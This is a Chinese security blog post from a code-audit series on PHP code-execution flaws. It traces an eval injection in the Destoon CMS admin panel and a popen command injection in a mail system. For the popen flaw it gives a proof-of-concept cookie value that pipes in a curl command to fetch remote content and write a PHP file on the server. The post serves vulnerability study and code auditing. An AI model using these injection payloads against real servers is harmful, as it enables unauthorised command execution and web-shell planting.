<!DOCTYPE html>
<html>
  <head><meta name="generator" content="Hexo 3.9.0">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta name="referrer" content="no-referrer">
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
  <meta name="description" content="关注网络安全">
  <meta name="keyword" content="web安全 代码审计">
  
    <link rel="shortcut icon" href="/css/images/logo.png">
  
  <title>
    
      代码审计的艺术系列 第十三篇 | 影风博客
    
  </title>
  <link href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
  <link href="//cdnjs.cloudflare.com/ajax/libs/nprogress/0.2.0/nprogress.min.css" rel="stylesheet">
  <link href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/[object Object].min.css" rel="stylesheet">
  <link rel="stylesheet" href="/css/style.css">
  
  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/geopattern/1.2.3/js/geopattern.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/nprogress/0.2.0/nprogress.min.js"></script>
  
    <script src="/js/qrious.js"></script>
  
  
  
  
    <!-- MathJax support START -->
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
    <!-- MathJax support END -->
  


<link rel="stylesheet" href="/css/prism-story.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>
<div class="wechat-share">
  <img src="/css/images/logo.png">
</div>

  <body>
    <header class="header fixed-header">
  <div class="header-container">
    <a class="home-link" href="/">
      <div class="logo"></div>
      <span>影风博客</span>
    </a>
    <ul class="right-list">
      
        <li class="list-item">
          
            <a href="/" class="item-link">主页</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/archives/" class="item-link">归档</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/tags/" class="item-link">标签</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/about/" class="item-link">关于</a>
          
        </li>
      
    </ul>
    <div class="menu">
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
    </div>
    <div class="menu-mask">
      <ul class="menu-list">
        
          <li class="menu-item">
            
              <a href="/" class="menu-link">主页</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/archives/" class="menu-link">归档</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/tags/" class="menu-link">标签</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/about/" class="menu-link">关于</a>
            
          </li>
        
      </ul>
    </div>
  </div>
</header>

    <div id="article-banner">
  <h2>代码审计的艺术系列 第十三篇</h2>
  <p class="post-date">2019-03-23</p>
  <div class="arrow-down">
    <a href="javascript:;"></a>
  </div>
</div>
<main class="app-body flex-box">
  <!-- Article START -->
  <article class="post-article">
    <section class="markdown-content"><h2 id="0x00-背景"><a href="#0x00-背景" class="headerlink" title="0x00 背景"></a>0x00 背景</h2><p>代码和命令执行也是获取服务器权限的最直接有效的方法，这篇讲的就是代码审计中代码执行的安全问题。</p>
<p><img src="https://ww1.sinaimg.cn/large/006Fzy5igy1g19okp7nmyj30nf06taaq.jpg" alt></p>
<h2 id="0x01-危险函数"><a href="#0x01-危险函数" class="headerlink" title="0x01 危险函数"></a>0x01 危险函数</h2><p>危险函数主要参考了<code>Seay</code>的代码审计那本书，有下面几个：</p>
<blockquote>
<p>eval()<br>assert()<br>preg_replace()<br>call_user_func()<br>call_user_func_array()<br>array_map()</p>
</blockquote>
<h2 id="0x02-eval案例"><a href="#0x02-eval案例" class="headerlink" title="0x02 eval案例"></a>0x02 eval案例</h2><p>之前审计过<code>Destoon</code>这款<code>CMS</code>，发现后台一处代码执行漏洞，漏洞位于<code>admin/tag.inc.php</code></p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token keyword">case</span> <span class="token string">'preview'</span><span class="token punctuation">:</span>
    <span class="token variable">$db</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">halt</span> <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>
    <span class="token variable">$destoon_task</span> <span class="token operator">=</span> <span class="token string">''</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$tag_css</span><span class="token punctuation">)</span> <span class="token variable">$tag_css</span> <span class="token operator">=</span> <span class="token function">stripslashes</span><span class="token punctuation">(</span><span class="token variable">$tag_css</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$tag_html_s</span><span class="token punctuation">)</span> <span class="token variable">$tag_html_s</span> <span class="token operator">=</span> <span class="token function">stripslashes</span><span class="token punctuation">(</span><span class="token variable">$tag_html_s</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$tag_html_e</span><span class="token punctuation">)</span> <span class="token variable">$tag_html_e</span> <span class="token operator">=</span> <span class="token function">stripslashes</span><span class="token punctuation">(</span><span class="token variable">$tag_html_e</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$tag_code</span><span class="token punctuation">)</span> <span class="token variable">$tag_code</span> <span class="token operator">=</span> <span class="token function">stripslashes</span><span class="token punctuation">(</span><span class="token variable">$tag_code</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$tag_js</span><span class="token punctuation">)</span> <span class="token variable">$tag_js</span> <span class="token operator">=</span> <span class="token function">stripslashes</span><span class="token punctuation">(</span><span class="token variable">$tag_js</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token variable">$code_eval</span> <span class="token operator">=</span> <span class="token variable">$code_call</span> <span class="token operator">=</span> <span class="token variable">$code_html</span> <span class="token operator">=</span> <span class="token string">''</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$tag_css</span><span class="token punctuation">)</span> <span class="token variable">$code_eval</span> <span class="token punctuation">.</span><span class="token operator">=</span> <span class="token string">'&lt;style type="text/css">'</span><span class="token punctuation">.</span><span class="token string">"\n"</span><span class="token punctuation">.</span><span class="token string">''</span><span class="token punctuation">.</span><span class="token variable">$tag_css</span><span class="token punctuation">.</span><span class="token string">''</span><span class="token punctuation">.</span><span class="token string">"\n"</span><span class="token punctuation">.</span><span class="token string">'&lt;/style>'</span><span class="token punctuation">.</span><span class="token string">"\n"</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$tag_html_s</span><span class="token punctuation">)</span> <span class="token variable">$code_eval</span> <span class="token punctuation">.</span><span class="token operator">=</span> <span class="token variable">$tag_html_s</span><span class="token punctuation">.</span><span class="token string">"\n"</span><span class="token punctuation">;</span>
    <span class="token variable">$code_call</span> <span class="token operator">=</span> <span class="token variable">$code_eval</span><span class="token punctuation">;</span>
    <span class="token variable">$code_call</span> <span class="token punctuation">.</span><span class="token operator">=</span> <span class="token variable">$tag_code</span><span class="token punctuation">.</span><span class="token string">"\n"</span><span class="token punctuation">;</span>
    <span class="token variable">$tag_code</span> <span class="token operator">=</span> <span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">'&lt;!--{'</span><span class="token punctuation">,</span> <span class="token string">''</span><span class="token punctuation">,</span> <span class="token variable">$tag_code</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$tag_code</span> <span class="token operator">=</span> <span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">'}-->'</span><span class="token punctuation">,</span> <span class="token string">''</span><span class="token punctuation">,</span> <span class="token variable">$tag_code</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">strpos</span><span class="token punctuation">(</span><span class="token variable">$tag_code</span><span class="token punctuation">,</span> <span class="token string">'",'</span><span class="token punctuation">)</span> <span class="token operator">!==</span> <span class="token boolean">false</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token variable">$tag_code</span> <span class="token operator">=</span> <span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">', '</span><span class="token punctuation">.</span><span class="token variable">$tag_expires</span><span class="token punctuation">.</span><span class="token string">')'</span><span class="token punctuation">,</span> <span class="token string">', -1)'</span><span class="token punctuation">,</span> <span class="token variable">$tag_code</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
        <span class="token variable">$tag_code</span> <span class="token operator">=</span> <span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">'")'</span><span class="token punctuation">,</span> <span class="token string">'", -1)'</span><span class="token punctuation">,</span> <span class="token variable">$tag_code</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    <span class="token variable">$tag_code</span> <span class="token punctuation">.</span><span class="token operator">=</span> <span class="token string">';'</span><span class="token punctuation">;</span>
    <span class="token function">ob_start</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">eval</span><span class="token punctuation">(</span><span class="token variable">$tag_code</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment" spellcheck="true">//eval直接执行1</span>
    <span class="token variable">$contents</span> <span class="token operator">=</span> <span class="token function">ob_get_contents</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">ob_clean</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$code_eval</span> <span class="token punctuation">.</span><span class="token operator">=</span> <span class="token variable">$contents</span><span class="token punctuation">.</span><span class="token string">"\n"</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$tag_html_e</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token variable">$code_eval</span> <span class="token punctuation">.</span><span class="token operator">=</span> <span class="token variable">$tag_html_e</span><span class="token punctuation">;</span>
        <span class="token variable">$code_call</span> <span class="token punctuation">.</span><span class="token operator">=</span> <span class="token variable">$tag_html_e</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    <span class="token variable">$t</span> <span class="token operator">=</span> <span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">'",'</span><span class="token punctuation">,</span> <span class="token string">'&amp;debug=1",'</span><span class="token punctuation">,</span> <span class="token variable">$tag_code</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">ob_start</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">eval</span><span class="token punctuation">(</span><span class="token variable">$t</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment" spellcheck="true">//eval直接执行2</span>
    <span class="token variable">$td</span> <span class="token operator">=</span> <span class="token function">ob_get_contents</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">ob_clean</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter">?></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>可以很直观看到<code>$tag_code</code>未经过危险字符的过滤就直接被<code>eval</code>执行了两次。</p>
<p>直接赋值给<code>tag_code=phpinfo()</code>可以查看下当前网站的基本信息，我们可以结合<code>echo</code>命令来进一步达到命令执行的效果如下：</p>
<p><img src="https://ww1.sinaimg.cn/large/006Fzy5igy1g19okpcblsj30o60h7425.jpg" alt></p>
<h2 id="0x03-popen案例"><a href="#0x03-popen案例" class="headerlink" title="0x03 popen案例"></a>0x03 popen案例</h2><p>漏洞详情:</p>
<p>某知名邮件系统就被审计出几处命令执行漏洞，其中<code>popen</code>函数引发的漏洞位于文件<code>/user/autoComplete.php</code></p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token variable">$arr</span> <span class="token operator">=</span> <span class="token function">explode</span><span class="token punctuation">(</span><span class="token string">"&amp;"</span><span class="token punctuation">,</span><span class="token variable">$_COOKIE</span><span class="token punctuation">[</span><span class="token string">"USER"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment" spellcheck="true">//--验证cookie。</span>
<span class="token keyword">for</span><span class="token punctuation">(</span><span class="token variable">$i</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">;</span><span class="token variable">$i</span><span class="token operator">&lt;</span><span class="token function">count</span><span class="token punctuation">(</span><span class="token variable">$arr</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token variable">$i</span><span class="token operator">++</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">ereg</span><span class="token punctuation">(</span><span class="token string">"^SKIN=(.*)$"</span><span class="token punctuation">,</span><span class="token variable">$arr</span><span class="token punctuation">[</span><span class="token variable">$i</span><span class="token punctuation">]</span><span class="token punctuation">,</span><span class="token variable">$reg</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token punctuation">{</span>
        <span class="token variable">$skin</span> <span class="token operator">=</span> <span class="token function">trim</span><span class="token punctuation">(</span><span class="token variable">$reg</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">ereg</span><span class="token punctuation">(</span><span class="token string">"^UID=(.*)$"</span><span class="token punctuation">,</span><span class="token variable">$arr</span><span class="token punctuation">[</span><span class="token variable">$i</span><span class="token punctuation">]</span><span class="token punctuation">,</span><span class="token variable">$reg</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token punctuation">{</span>
        <span class="token variable">$uid</span>  <span class="token operator">=</span> <span class="token function">trim</span><span class="token punctuation">(</span><span class="token variable">$reg</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">ereg</span><span class="token punctuation">(</span><span class="token string">"^DOMAIN=(.*)$"</span><span class="token punctuation">,</span><span class="token variable">$arr</span><span class="token punctuation">[</span><span class="token variable">$i</span><span class="token punctuation">]</span><span class="token punctuation">,</span><span class="token variable">$reg</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token punctuation">{</span>
        <span class="token variable">$domain</span>  <span class="token operator">=</span> <span class="token function">trim</span><span class="token punctuation">(</span><span class="token variable">$reg</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">ereg</span><span class="token punctuation">(</span><span class="token string">"^TOKEN=(.*)$"</span><span class="token punctuation">,</span><span class="token variable">$arr</span><span class="token punctuation">[</span><span class="token variable">$i</span><span class="token punctuation">]</span><span class="token punctuation">,</span><span class="token variable">$reg</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token punctuation">{</span>
        <span class="token variable">$token</span>  <span class="token operator">=</span> <span class="token function">trim</span><span class="token punctuation">(</span><span class="token variable">$reg</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>
<span class="token variable">$part</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'s'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token comment" spellcheck="true">//$uid = "support";</span>
<span class="token comment" spellcheck="true">//$domain = "xx.com";</span>
<span class="token variable">$users</span> <span class="token operator">=</span> <span class="token function">readAddress</span><span class="token punctuation">(</span><span class="token variable">$uid</span><span class="token punctuation">,</span> <span class="token variable">$domain</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>直接从<code>cookie</code>中获取<code>USER</code>里的<code>uid</code>和<code>domain</code>并赋给了<code>readAddress</code>函数，然后我们跟进<code>readAddress($uid, $domain);</code></p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token keyword">function</span> <span class="token function">readAddress</span><span class="token punctuation">(</span><span class="token variable">$uid</span><span class="token punctuation">,</span><span class="token variable">$domain</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token variable">$binary</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$userDir</span> <span class="token operator">=</span> <span class="token function">getUserDir</span><span class="token punctuation">(</span><span class="token variable">$uid</span><span class="token punctuation">,</span><span class="token variable">$domain</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$addressDir</span> <span class="token operator">=</span> <span class="token function">trim</span><span class="token punctuation">(</span><span class="token variable">$userDir</span><span class="token punctuation">,</span> <span class="token string">"\n\r "</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token string">"/Profile/alias.individual"</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">is_file</span><span class="token punctuation">(</span><span class="token variable">$addressDir</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token keyword">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
    <span class="token variable">$fp</span> <span class="token operator">=</span> <span class="token function">fopen</span><span class="token punctuation">(</span><span class="token variable">$addressDir</span><span class="token punctuation">,</span> <span class="token string">"r"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token variable">$fp</span><span class="token punctuation">)</span><span class="token punctuation">{</span> 
                <span class="token keyword">echo</span> <span class="token string">"打开地址薄失败"</span><span class="token punctuation">;</span>
                exit<span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
    <span class="token keyword">while</span><span class="token punctuation">(</span><span class="token boolean">false</span> <span class="token operator">!=</span> <span class="token punctuation">(</span><span class="token variable">$content</span> <span class="token operator">=</span> <span class="token function">fgets</span><span class="token punctuation">(</span><span class="token variable">$fp</span><span class="token punctuation">,</span> <span class="token number">568</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">{</span>

        <span class="token variable">$binary</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token function">unpack</span><span class="token punctuation">(</span><span class="token string">"a20nick_name/a40email/a40name/a60h_street_address/a30h_city/a30h_province/a8h_zip/a20h_country/a16h_phone/a30c_company/a60c_street_address/a30c_city/a30c_province/a8c_zip/a20c_country/a16c_phone/a16pager/a16cellular/a16fax/a20icq/a30other/a5b_year/a3b_month/a3b_day"</span><span class="token punctuation">,</span><span class="token variable">$content</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    <span class="token comment" spellcheck="true">//var_dump($binary);</span>
    <span class="token keyword">return</span> <span class="token variable">$binary</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><code>uid</code>和<code>domain</code>又进入了函数<code>getUserDir($uid,$domain)</code>，我们继续跟进<code>getUserDir</code></p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token keyword">function</span> <span class="token function">getUserDir</span><span class="token punctuation">(</span><span class="token variable">$uid</span><span class="token punctuation">,</span> <span class="token variable">$domain</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token variable">$handle</span> <span class="token operator">=</span> <span class="token function">popen</span><span class="token punctuation">(</span><span class="token string">"/var/xxx/sbin/hashid $uid $domain"</span><span class="token punctuation">,</span> <span class="token string">'r'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$read</span> <span class="token operator">=</span> <span class="token function">fread</span><span class="token punctuation">(</span><span class="token variable">$handle</span><span class="token punctuation">,</span> <span class="token number">2096</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">pclose</span><span class="token punctuation">(</span><span class="token variable">$handle</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> <span class="token variable">$read</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>我们注意到下面的代码</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token variable">$handle</span> <span class="token operator">=</span> <span class="token function">popen</span><span class="token punctuation">(</span><span class="token string">"/var/*/sbin/hashid $uid $domain"</span><span class="token punctuation">,</span> <span class="token string">'r'</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>这里的<code>/var/*/sbin/hashid</code>是该邮件系统执行命令的，所以这里<code>uid</code>和<code>domain</code>均未进行过滤就直接执行了命令，导致任意命令执行漏洞。</p>
<p>漏洞证明:</p>
<p>访问</p>
<blockquote>
<p><a href="http://localhost/user/autoComplete.php" target="_blank" rel="noopener">http://localhost/user/autoComplete.php</a></p>
</blockquote>
<p>时设置<code>cookie</code>为：</p>
<blockquote>
<p>UID=1|curl http://<strong>.</strong>.<strong>.</strong>/test.txt&gt;&gt;testinfo.php</p>
</blockquote>
<p>此时会在程序的<code>user</code>目录下生成<code>testinfo.php</code>，我们再次访问</p>
<blockquote>
<p><a href="http://localhost/user/testinfo.php" target="_blank" rel="noopener">http://localhost/user/testinfo.php</a></p>
</blockquote>
<p>即可证明<code>popen</code>执行<code>curl</code>命令写入成功：</p>
<p><img src="https://ww1.sinaimg.cn/large/006Fzy5igy1g19p19xxivj30sx0bd0t7.jpg" alt></p>
</section>
    <!-- Tags START -->
    
      <div class="tags">
        <span>Tags:</span>
        
  <a href="/tags#代码审计" >
    <span class="tag-code">代码审计</span>
  </a>

      </div>
    
    <!-- Tags END -->
    <!-- NAV START -->
    
  <div class="nav-container">
    <!-- reverse left and right to put prev and next in a more logic postition -->
    
      <a class="nav-left" href="/2019/03/23/dai-ma-shen-ji-de-yi-zhu-xi-lie-di-shi-er-pian/">
        <span class="nav-arrow">← </span>
        
          代码审计的艺术系列 第十二篇
        
      </a>
    
    
      <a class="nav-right" href="/2019/07/12/vmware-xu-ni-ji-san-chong-wang-luo-lian-jie-mo-shi-xiang-jie/">
        
          VMware虚拟机三种网络连接模式详解
        
        <span class="nav-arrow"> →</span>
      </a>
    
  </div>

    <!-- NAV END -->
    <!-- 打赏 START -->
    
      <div class="money-like">
        <div class="reward-btn">
          赏
          <span class="money-code">
            <span class="alipay-code">
              <div class="code-image"></div>
              <b>使用支付宝打赏</b>
            </span>
            <span class="wechat-code">
              <div class="code-image"></div>
              <b>使用微信打赏</b>
            </span>
          </span>
        </div>
        <p class="notice">若你觉得我的文章对你有帮助，欢迎点击上方按钮对我打赏</p>
      </div>
    
    <!-- 打赏 END -->
    <!-- 二维码 START -->
    
      <div class="qrcode">
        <canvas id="share-qrcode"></canvas>
        <p class="notice">扫描二维码，分享此文章</p>
      </div>
    
    <!-- 二维码 END -->
    
      <!-- No Comment -->
    
  </article>
  <!-- Article END -->
  <!-- Catalog START -->
  
    <aside class="catalog-container">
  <div class="toc-main">
    <strong class="toc-title">Catalog</strong>
    
      <ol class="toc-nav"><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x00-背景"><span class="toc-nav-text">0x00 背景</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x01-危险函数"><span class="toc-nav-text">0x01 危险函数</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x02-eval案例"><span class="toc-nav-text">0x02 eval案例</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x03-popen案例"><span class="toc-nav-text">0x03 popen案例</span></a></li></ol>
    
  </div>
</aside>
  
  <!-- Catalog END -->
</main>

<script>
  (function () {
    var url = 'https://storysec.github.io/2019/03/23/dai-ma-shen-ji-de-yi-zhu-xi-lie-di-shi-san-pian/';
    var banner = ''
    if (banner !== '' && banner !== 'undefined' && banner !== 'null') {
      $('#article-banner').css({
        'background-image': 'url(' + banner + ')'
      })
    } else {
      $('#article-banner').geopattern(url)
    }
    $('.header').removeClass('fixed-header')

    // error image
    $(".markdown-content img").on('error', function() {
      $(this).attr('src', 'http://file.muyutech.com/error-img.png')
      $(this).css({
        'cursor': 'default'
      })
    })

    // zoom image
    $(".markdown-content img").on('click', function() {
      var src = $(this).attr('src')
      if (src !== 'http://file.muyutech.com/error-img.png') {
        var imageW = $(this).width()
        var imageH = $(this).height()

        var zoom = ($(window).width() * 0.95 / imageW).toFixed(2)
        zoom = zoom < 1 ? 1 : zoom
        zoom = zoom > 2 ? 2 : zoom
        var transY = (($(window).height() - imageH) / 2).toFixed(2)

        $('body').append('<div class="image-view-wrap"><div class="image-view-inner"><img src="'+ src +'" /></div></div>')
        $('.image-view-wrap').addClass('wrap-active')
        $('.image-view-wrap img').css({
          'width': `${imageW}`,
          'transform': `translate3d(0, ${transY}px, 0) scale3d(${zoom}, ${zoom}, 1)`
        })
        $('html').css('overflow', 'hidden')

        $('.image-view-wrap').on('click', function() {
          $(this).remove()
          $('html').attr('style', '')
        })
      }
    })
  })();
</script>


  <script>
    var qr = new QRious({
      element: document.getElementById('share-qrcode'),
      value: document.location.href
    });
  </script>






    <div class="scroll-top">
  <span class="arrow-icon"></span>
</div>
    <footer class="app-footer">
<div align="center">
    <table width="980" height="35" border="0" align="center">
        <tr>
            <td>
            友情链接：&nbsp;&nbsp;
            <a target="_blank" href="https://woj.app/">蜗居</a>
			&nbsp;|&nbsp;
            <a target="_blank" href="https://mrxn.net">Mrxn</a>
            &nbsp;|&nbsp;
            <a target="_blank" href="http://hacktech.cn">Akkuman</a>
            &nbsp;|&nbsp;
            <a target="_blank" href="http://www.bugsafe.cn">Poacher</a>
            &nbsp;|&nbsp;
            <a target="_blank" href="http://www.se7ensec.cn">Se7en</a>
            &nbsp;|&nbsp;
            <a target="_blank" href="https://www.ipz.me/">影乐</a>
            &nbsp;|&nbsp;
            <a target="_blank" href="http://www.jiufox.com/">九尾狐</a>
            &nbsp;|&nbsp;
            <a target="_blank" href="http://azfashao.com/">爱在发烧</a>
            &nbsp;|&nbsp;
            <a target="_blank" href="https://www.web443.com/">Web443</a>
            &nbsp;|&nbsp;
            <a target="_blank" href="https://deelmind.cn/">DeeLMind</a>
            &nbsp;|&nbsp;
            <a target="_blank" href="http://www.moonsec.com/">暗月</a>
            &nbsp;|&nbsp;
            <a target="_blank" href="https://xingqingsafe.github.io/">星晴</a>
            </td>
        </tr>
    </table>
</div>


  <p class="copyright">
    &copy; 2019 | Proudly powered by <a href="https://hexo.io" target="_blank">Hexo</a>
    <br>
    Theme by <a href="https://github.com/yanm1ng/hexo-theme-vexo">yanm1ng</a>
  </p>
  
<span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>

</footer>


<script>
  function async(u, c) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }
</script>
<script>
  async("//cdnjs.cloudflare.com/ajax/libs/fastclick/1.0.6/fastclick.min.js", function(){
    FastClick.attach(document.body);
  })
</script>

<script>
  var hasLine = 'true';
  async("//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js", function(){
    $('figure pre').each(function(i, block) {
      var figure = $(this).parents('figure');
      if (hasLine === 'false') {
        figure.find('.gutter').hide();
      }
      var lang = figure.attr('class').split(' ')[1] || 'code';
      var codeHtml = $(this).html();
      var codeTag = document.createElement('code');
      codeTag.className = lang;
      codeTag.innerHTML = codeHtml;
      $(this).attr('class', '').empty().html(codeTag);
      figure.attr('data-lang', lang.toUpperCase());
      hljs.highlightBlock(block);
    });
  })
</script>
<!-- Baidu Tongji -->

<script src="/js/script.js"></script>
  </body>
</html>